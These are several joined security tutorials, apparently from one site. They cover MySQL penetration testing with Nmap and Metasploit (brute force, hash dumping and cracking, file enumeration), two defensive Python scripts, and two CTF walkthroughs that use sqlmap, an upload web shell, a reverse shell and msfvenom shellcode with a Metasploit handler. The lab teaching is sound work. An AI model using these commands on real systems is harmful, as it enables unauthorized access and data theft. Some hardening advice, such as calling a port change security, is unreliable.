MySQL Penetration Testing with NMAP

In this article we discuss MySQL penetration testing using Nmap, where you will learn how to retrieve database information such as database names, table records, usernames and passwords.

MySQL is an open-source relational database management system that uses Structured Query Language (SQL) to create and manage database records.

Let's begin!!!

Scanning for port 3306

Open the terminal and type the following command to check whether the MySQL service is running on the targeted system. By default the MySQL service listens on port 3306.

nmap -sT 192.168.1.216

From the given image you can observe that port 3306 is open for the MySQL service; now let's enumerate it.

Retrieve mysql information

Now type the following command to retrieve MySQL information such as the version and protocol:

nmap --script=mysql-info 192.168.1.216

The above command connects to the MySQL server and prints information such as the protocol (10), version number (5.5.57-0ubuntu0.14.04.1), thread ID (159), status (auto commit), capabilities, and the password salt, as shown in the image below.

Brute force attack

This command uses a username dictionary and a password dictionary and tries every username/password combination in a brute-force attack against MySQL.

nmap -p 3306 --script mysql-brute --script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From the given image you can observe that it found the valid credential root:toor. This credential allows direct login to the MySQL server.

Retrieve mysql user names

This command fetches the MySQL user names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-users 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can see that we found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command fetches the MySQL database names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-databases 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the image below you can read the names of the created databases, such as ignite.

This command performs the same task as above, but retrieves the database names by running the MySQL query "show databases".

nmap -p 3306 192.168.1.216 --script mysql-query --script-args "query=show databases,username=root,password=toor"

From the image below you can read the names of the created databases, such as ignite.

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another, we store the value in a MySQL user-defined variable.

This command fetches the MySQL variable names with the help of the given arguments mysqluser=root and mysqlpass=toor.

nmap -p 3306 --script=mysql-variables 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe the ON/OFF status of each MySQL variable.

Retrieve Hash password

This command dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

nmap -p 3306 --script=mysql-dump-hashes 192.168.1.216 --script-args mysqluser=root,mysqlpass=toor

From the given image you can observe that it has dumped the password hashes of the respective users that we enumerated above.

Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher

Penetration Testing on MYSQL (Port 3306)

Hello friends!! Today we are discussing internal penetration testing on a MySQL server. In our previous article we already discussed how to configure MySQL on Ubuntu, which you can read here; now we move on to its penetration testing.

Attacker: Kali Linux

Target: Ubuntu 14.04.1 (MySQL server), IP: 192.168.1.216

Let's start!!

Scanning MySQL

Scanning plays an important role in penetration testing because through scanning the attacker learns which services and open ports are available for enumeration and attack.

Here we use nmap to scan for port 3306.

nmap -sT 192.168.1.216

If the service is running on the targeted server, nmap shows the STATE of port 3306 as open.

Enumerating MYSQL Banner

An attacker always performs enumeration to find important information such as the software version (known as banner grabbing) and then checks whether that version is vulnerable to any known exploit.

Open the terminal in your Kali Linux and load the Metasploit framework; now type the following commands to scan for the MySQL version.

use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From the given image you can read the highlighted text, which shows that MySQL 5.5.57 with protocol 10 is installed on the Ubuntu 14.04.1 operating system.

MySQL Brute Force Attack

An attacker always tries a brute-force attack to steal credentials for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (the default is root with a blank password).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This starts the brute-force attack and tries to match a valid username and password combination using the users.txt and password.txt files.

From the given image you can observe that our MySQL server is not secure against brute-force attack, because it shows the matching combination username: root and password: toor for login.

Once the attacker retrieves valid credentials, they can log directly into the MySQL server to steal or destroy database information.
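Both the mysql-brute script in the Nmap article above and the mysql_login module in this section leave the same trace on the server: a burst of "Access denied" entries from one source host against several accounts. The following Python script is an added defender-side example (not code from the original article): it parses constructed MySQL 5.5-style error-log lines, groups failures by source host, and flags hosts that exceed a failure or distinct-username threshold. On MySQL 5.5/5.6 these warnings are written to the error log only when log_warnings is set greater than 1; the log lines, the thresholds and the source addresses 192.168.1.99 and 192.168.1.50 are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of MySQL 5.5-style error-log lines (not taken from the article).
# The repeated "Access denied" entries from 192.168.1.99 are what a dictionary
# attack against port 3306 looks like from the server side.
SAMPLE_LOG = """\
171210 10:15:01 [Warning] Access denied for user 'root'@'192.168.1.99' (using password: YES)
171210 10:15:01 [Warning] Access denied for user 'root'@'192.168.1.99' (using password: YES)
171210 10:15:02 [Warning] Access denied for user 'admin'@'192.168.1.99' (using password: YES)
171210 10:15:02 [Warning] Access denied for user 'root'@'192.168.1.99' (using password: YES)
171210 10:15:03 [Warning] Access denied for user 'sr'@'192.168.1.99' (using password: YES)
171210 10:15:03 [Warning] Access denied for user 'root'@'192.168.1.99' (using password: NO)
171210 10:16:00 [Warning] Access denied for user 'st'@'192.168.1.50' (using password: YES)
171210 10:17:00 [Note] Event Scheduler: Loaded 0 events
"""

# Timestamp, severity, then the user@host pair MySQL prints in the denial message.
DENIED_RE = re.compile(
    r"^(?P<date>\d{6}\s+\d{2}:\d{2}:\d{2})\s+\[Warning\]\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
)


def parse_denied(log_text):
    """Yield (timestamp, user, host) for every access-denied line; other lines are ignored."""
    for line in log_text.splitlines():
        m = DENIED_RE.match(line)
        if m:
            yield m.group("date"), m.group("user"), m.group("host")


def summarize_by_host(log_text):
    """Return {host: {"failures": count, "users": sorted list of usernames tried}}."""
    summary = defaultdict(lambda: {"failures": 0, "users": set()})
    for _, user, host in parse_denied(log_text):
        summary[host]["failures"] += 1
        summary[host]["users"].add(user)
    return {
        host: {"failures": v["failures"], "users": sorted(v["users"])}
        for host, v in summary.items()
    }


def flag_bruteforce(log_text, max_failures=5, max_users=2):
    """Return sorted (host, failures, users) tuples for hosts over either threshold.

    A single mistyped password never trips this; a dictionary attack does, either
    by sheer volume or by spraying several account names from one address.
    """
    flagged = []
    for host, stats in summarize_by_host(log_text).items():
        if stats["failures"] >= max_failures or len(stats["users"]) > max_users:
            flagged.append((host, stats["failures"], stats["users"]))
    return sorted(flagged)


if __name__ == "__main__":
    for host, n, users in flag_bruteforce(SAMPLE_LOG):
        print(f"{host}: {n} failed logins against {len(users)} account(s): {', '.join(users)}")
```

Point the script at the real error log (on the Ubuntu target in this article, /var/log/mysql/error.log) once log_warnings is raised; the thresholds are a starting point and should be tuned to the normal failure rate of the application accounts that connect to the server.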

Stealing MYSQL information using metasploit

This module allows simple SQL statements to be executed against a MySQL instance, given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From the given image you can observe that it has executed the SQL query and dumped the names of the databases.

This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) > set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) > set username root

msf auxiliary(mysql_schemadump) > set password toor

msf auxiliary(mysql_schemadump) > run

Here it has dumped the information schema for the database "ignite", with the table name "student" and its 5 column names and column types:

DB: ignite

Table name: student

  • Last Name (varchar 30)
  • First Name (varchar 30)
  • Student ID (int 11)
  • Major (varchar 20)
  • Dorm (varchar 20)

Check file privileges

Open the my.cnf file to verify the file privileges using the following command:

gedit /etc/mysql/my.cnf

Here you can see that the statements given below are uncommented:

  • mysqld_safe
  • mysqld
  • secure_file_priv

If these statements are uncommented, it becomes very easy for an attacker to perform file enumeration.

MySQL File Enumeration

This module enumerates files and directories using the MySQL load_file feature.

use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_file_enum) > set username root

msf auxiliary(mysql_file_enum) > set password toor

msf auxiliary(mysql_file_enum) > set DIR_LIST /root/Desktop/file.txt

msf auxiliary(mysql_file_enum) > run

Here it starts checking whether each entry in the given file list exists on the target system or not.

From the given image you can observe that it found that the directories /etc, /var and /var/www exist.

This module enumerates writable directories using the MySQL SELECT INTO DUMPFILE feature; for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text "test" will be written to the directory.***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST /root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we assigned a list of directories so that we can identify the writable ones, and from the given image you can observe that it found write permission only for /tmp.

MySQL User Enumeration

This module allows simple enumeration of a MySQL database server, provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It starts retrieving information such as the list of other user accounts and the user privileges on the MySQL server.

From the given image it will be clear to you that it has shown the list of accounts with password hashes and the list of users who have GRANT privileges.

As you can see, apart from the user root there are more users, such as sr, with password hashes; you can crack these hashes using a password-cracking tool.

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set password toor

msf auxiliary(mysql_hashdump) > run

Now from the screenshot you can see the password hash for every user. Metasploit stores these hash values inside the /tmp folder and later uses John the Ripper to crack the passwords.

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials.

use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) > options

msf auxiliary(jtr_mysql_fast) > run

By default it uses the Metasploit wordlist against the saved hash values and starts cracking them.

If you look at the image below, you can see that it has successfully cracked the double SHA-1 hash and recovered the password in plain text.

Now, using the credentials retrieved above, you can try to log in to the MySQL server.

Here you can see that we have successfully logged in to the server. Hence an attacker can easily breach the security of the server and steal or modify important information.

Secure MYSQL through port forwarding

In order to secure the MySQL server, the admin can move the service from the default port to a different port. Open the my.cnf file using the following command to make the change:

gedit /etc/mysql/my.cnf

Now change port 3306 to any other port, such as 3000, as shown in the given image; save the changes and restart the service.

service mysql restart

Verify it using the nmap command as given below:

nmap -sT 192.168.1.216

Protect MySQL against brute-force attacks

In order to secure the MySQL server, the admin can bind the service to localhost. Open the my.cnf file using the following command to make the change:

gedit /etc/mysql/my.cnf

You only need to enable bind-address by uncommenting it, as shown in the given images, and then restart the service.

service mysql restart

Now let's verify it by running the same dictionary brute-force attack as above.

Great!! The attacker is not able to connect to the server, which therefore also resists brute-force attacks, as shown in the given image.

The admin should GRANT all privileges to a specific user only from a specific IP address, which prevents attackers from altering database information.

Now, to grant all privileges, log in to the MySQL server and type the following query:

mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.1.220' IDENTIFIED BY 'toor' WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation:

mysql> flush privileges;

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher
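The hardening steps in this article (moving off port 3306, enabling bind-address, and granting privileges to one specific host) together with the secure_file_priv setting inspected under "Check file privileges" can be audited mechanically instead of by eye in gedit. The following Python script is an added example and not code from the original article: it parses the [mysqld] section of a my.cnf the way mysqld reads it (comments stripped, bind_address and bind-address treated alike), reports each weak setting, and checks whether a GRANT statement names a specific host rather than '%'. Both config fragments and the /var/lib/mysql-files path are constructed for the example.

```python
import re

# Constructed my.cnf fragment showing the weak settings discussed in the article
# (not copied from the page): default port, bind-address commented out, and
# secure_file_priv empty, so LOAD_FILE() and SELECT ... INTO DUMPFILE can touch
# any path the mysqld process can read or write.
WEAK_CNF = """\
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock

[mysqld]
user = mysql
port = 3306
#bind-address = 127.0.0.1
secure_file_priv = ""
"""

# The same fragment after hardening: a non-default port, bound to localhost, and
# file operations confined to one directory (the path is an assumed example value).
HARDENED_CNF = """\
[mysqld_safe]
socket = /var/run/mysqld/mysqld.sock

[mysqld]
user = mysql
port = 3000
bind-address = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
"""


def parse_mysqld_section(text):
    """Return the active (uncommented) options of the [mysqld] section.

    Keys are lower-cased and '_' is normalised to '-' so that bind_address and
    bind-address compare equal, as they do for mysqld itself. A bare option such
    as skip-networking is stored with an empty value.
    """
    settings = {}
    section = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # '#' starts a comment anywhere on the line
        if not line:
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section != "mysqld":
            continue
        key, has_value, value = line.partition("=")
        key = key.strip().lower().replace("_", "-")
        settings[key] = value.strip().strip("\"'") if has_value else ""
    return settings


def audit_mysqld(text):
    """Return a list of findings for the three settings; an empty list means all passed."""
    s = parse_mysqld_section(text)
    findings = []
    if s.get("port", "3306") == "3306":  # 3306 is also what mysqld uses when port is unset
        findings.append("port: default 3306, found by any port scan")
    bind = s.get("bind-address")
    if "skip-networking" not in s and (bind is None or bind in ("0.0.0.0", "::", "*")):
        findings.append("bind-address: listening on all interfaces")
    if not s.get("secure-file-priv"):  # unset or "" leaves file functions unrestricted
        findings.append("secure_file_priv: LOAD_FILE()/INTO DUMPFILE unrestricted")
    return findings


# Matches the account part of a GRANT statement: TO 'user'@'host'
GRANT_HOST_RE = re.compile(r"\bTO\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'", re.IGNORECASE)


def grant_is_host_restricted(grant_sql):
    """True when the GRANT names one specific host rather than '%' or a %-pattern."""
    m = GRANT_HOST_RE.search(grant_sql)
    if not m:
        return False
    host = m.group("host")
    return host != "" and "%" not in host


if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, audit_mysqld(cnf) or ["ok"])
    print(grant_is_host_restricted(
        "GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.1.220' IDENTIFIED BY 'toor' WITH GRANT OPTION;"))
```

Run it against /etc/mysql/my.cnf after each change in this section and the findings list should shrink to empty; the GRANT check can be fed the output of SHOW GRANTS for each account to spot any that were created with a '%' host.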

Hack the thewall VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as thewall. The credit for making this VM goes to "Xerubus", and it is another boot2root challenge where we have to root the VM to complete it. You can download this VM here.

Let's Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.0.17, but you will have to find your own).

netdiscover

We did an nmap scan but it showed nothing, so we use arp to check whether the VM is broadcasting anything.

arp -an

We found that it is broadcasting something on the network, so we use Wireshark to check on which port it is broadcasting the data.

We found that it is broadcasting on port 1337, so we use netcat to listen on port 1337.

nc -lvp 1337

We found it was broadcasting something related to Pink Floyd; we run the nmap scan again to check whether anything changed.

nmap -sV 192.168.0.17

We can see that port 80 is open, so we open this IP in our browser.

We take a look at the page's source code and find a hexadecimal-encoded string.

When we decode it we find an MD5-hashed string and a hint to do steganography.

We decode the MD5-hashed string and find the string divisionbell.

We download the image from the webpage and use steghide to check whether something is hidden behind the image. When we try to extract the information it prompts for a password; using the string we decoded above we find that a text file is hidden inside the image and are able to extract it.

steghide --info pink_floyd.jpg

steghide extract -sf pink_floyd.jpg

When we open the text file we find a base64-encoded string, an MD5-hashed string and a hint to use them on port 1965.

First we decode the base64-encoded string and find the string SydBarret.

Then we decode the MD5-hashed string and find the string pinkfloydrocks.

Port enumeration on 1965 shows that it is running OpenSSH; we check whether we can log in with username SydBarret and password pinkfloydrocks.

When we try to log in it tells us that we can only connect through SFTP. So we use SydBarrett as the username and pinkfloydrocks as the password to log in through SFTP.

Now that we are inside, we find a file called eclipsed_by_the_moon; we download it to our system.

We check what kind of file it is and find that it is a zip file, which we extract using tar.

file eclipsed_by_the_moon

tar xvfz eclipsed_by_the_moon

After extracting the file, we check what kind of file it is and find that it is a boot sector.

file eclipsed_by_the_moon.lsd

We check whether we can recover any files inside the boot sector using testdisk.

testdisk eclipsed_by_the_moon.lsd

We select the image to recover files from.

We select None (non-partitioned media), as it is a boot sector.

We go to Advanced to recover files from the image.

We then select the partition from which we want to extract the files and select Undelete to recover them.

We find that an image file is recovered; we copy it.

We select the directory on our system into which we want to copy the file.

We look at the image we just recovered and find a picture of Roger Waters; we also get a password inside the image.

We log in through SSH; enumerating the username we find that RogerWaters is the username and the password is hello_is_there_anybody_in_there.

After getting in, we find that there are different directories for the different users, named after Pink Floyd band members.

ls -al

We also find that we have limited access and cannot access their directories, so we check for binaries available to other users and find that the users NickMason and DavidGilmour have binaries called brick and shineon available to them.

find / -user DavidGilmour 2>/dev/null

find / -user NickMason 2>/dev/null

We don't have access to run the binary shineon, but when we run brick it asks us a question. When we answer it correctly we become the user NickMason.

Now we can access the directory NickMason/. We find an image file inside; we use scp to send it to our local system.

scp nick_mason_profile_pic.jpg [email protected]:/root/Desktop

We check the file type and find that it is an audio file, so we rename it from .jpg to .ogg.

When we listen to the audio, we find that Morse code is playing in the background along with the music. We cut the frequency of the audio to retrieve the Morse code.

.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .. ... .-

We find that the Morse code translates to richardwright1943farfisa. We use RichardWright as the username and 1943farfisa as the password to log in as user RichardWright.

Now we try to run the binary shineon; after running it we find that we can change the folder with a symbolic link from DavidGilmour to RichardWright.

ln -s /bin/ksh /tmp/mail

export PATH=/tmp:$PATH

When we now run shineon we become the user DavidGilmour.

Inside the DavidGilmour/ folder we find a link inside a file.

When we open this link in the browser we find an image with something written on it.

When we decrease the contrast of the image, we find a hexadecimal string.

Then we also send an image file that we find inside the DavidGilmour/ folder using scp.

scp david_gilmour_profile_pic.jpg [email protected]:/root/Desktop/

We check for strings inside the image file and find the string who_are_you_and_who_am_i.

Now we use DavidGilmour as the username and who_are_you_and_who_am_i as the password.

We are now in the welcometothemachine group; we move into /var/www/htdocs/welcometothemachine/.

We find a file called PinkFloyd; we run it and find that it asks a question. We answer with the hexadecimal string from the image we found on the webpage.

Now we are given permission to get root, as DavidGilmour is added to the sudoers after running this program.

Now when we enter the root/ directory we find the flag, marking the end of the VM challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.

Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as IMF. The credit for making this VM goes to "Geckom", and it is another CTF challenge where we have to find 6 flags to complete it. You can download this VM here.

Let's Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.0.25, but you will have to find your own).

netdiscover

We use nmap for port enumeration.

nmap -sV 192.168.0.25

We find that port 80 is open, so we open the IP address in our browser.

We take a look at the source code and find a few JavaScript files whose names look base64-encoded.

We open them and find nothing interesting, but when we join their names and decode them we find our 2nd flag.

Inside the flag we find another base64-encoded string; decoding it we find the string imfadministrator.

We take a look around the website, and in the source code of the contact.php page we find our 1st flag.

Flag 1 contains a base64-encoded string; decoding it we find the string allthefiles.

We open allthefiles and imfadministrator in the browser. We find that imfadministrator is a directory that leads to a login page.

On the contact.php page we found a few email addresses, so we use cewl to make a dictionary.

We use Burp Suite to launch a dictionary attack. We select the position and change the password parameter from a string to an array.

Now, when the login is successful, we find the third flag in the response.

Now that we can access the page, we see that it might be vulnerable to SQL injection.

Using Burp Suite we capture the request for this page and save it to a text file.

We use sqlmap to dump the database.

sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all

We find the names of the pages along with another page called tutorial-incomplete. We open it in our browser and find a page with a QR code inside an image.

When we decode the QR code we get our 4th flag.

Inside our flag we find a base64-encoded string; when we decode it we find the string uploadr942.php.

We open it in our browser and find a page to upload a file.

Now, while uploading a shell, we find that the page is protected by a WAF, so we create a custom shell and save it as a GIF file to bypass the WAF.

Now we upload the file and check the response from the server to find where our file was uploaded.

We find that the server sends a string in a comment; our file is in the uploads folder, and the comment in the server's response is the name of our file.

After finding our shell, we find the 5th flag. Now we use web_delivery to get a reverse shell using Metasploit.

We set up Metasploit for web delivery and execute the command in our shell.

Now that we have the reverse shell we take a look inside the 5th flag.

We find a base64-encoded string; when we decode it we find the string agentservices.

We check the connections of our server using netstat.

netstat -antp

We found a service running on port 7788; we use curl to find what the server is running on port 7788.

curl localhost:7788

We find that a service called agent is running, so we find the location of agent using the which command.

which agent

When we move into that folder we find a file called access_codes; we open it and find a few numbers. It looks like a sequence for port knocking.

So we knock on the server and find that port 7788 opens.

knock 192.168.0.25 7482 8279 9467

Now we download the agent program file to our system for reverse engineering.

download agent /root/Desktop

Now we reverse engineer the file to find an exploit. First we disassemble the main function.

gdb -q agent

disassemble main

We find that at memory address 80486ba a string-compare function is called, so we add a breakpoint there.

We break the program at 80486ba and run it. After running the program, we look at the memory locations associated with it.

break *0x80486ba

info registers

We look at the four words of memory above the stack pointer.

x/4xw 0xffffd340

At memory address 804c070 we find the password to access the program.

x/s 0x0804c070

Now we access the program on the server using netcat and find that the string gives us access to the program.

netcat 192.168.0.25 7788

Now we create an exploit for this program; first we generate the shellcode with msfvenom.

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 -f python -b '\x00\xa0\x0d'

Now we create our exploit using Python. We manually fuzz the memory location inside our exploit.

We set up our handler in Metasploit and execute the exploit.

msf > use exploit/multi/handler

msf exploit (handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit (handler) > set lhost 192.168.0.15

msf exploit (handler) > set lport 4444

msf exploit (handler) > run

Now we check for sessions and take the interactive shell.

msf exploit (handler) > sessions

msf exploit (handler) > sessions -i 3

Now we take the shell and check our privileges; we find that we are root. When we move inside the /root/ folder we find our 6th and final flag.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast.
